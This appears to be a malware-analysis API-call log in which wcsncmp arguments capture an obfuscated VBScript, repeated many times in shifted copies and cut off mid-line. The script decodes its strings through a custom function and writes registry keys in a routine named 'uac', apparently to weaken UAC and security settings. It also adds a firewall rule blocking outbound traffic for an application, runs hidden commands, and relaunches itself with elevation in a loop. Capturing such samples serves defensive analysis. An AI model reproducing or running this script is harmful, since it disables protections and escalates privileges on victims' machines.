bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.021] wcsncmp (_String1="le.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.021] wcsncmp (_String1="e.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.021] wcsncmp (_String1=".Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.021] wcsncmp (_String1="Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.021] wcsncmp (_String1="escription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 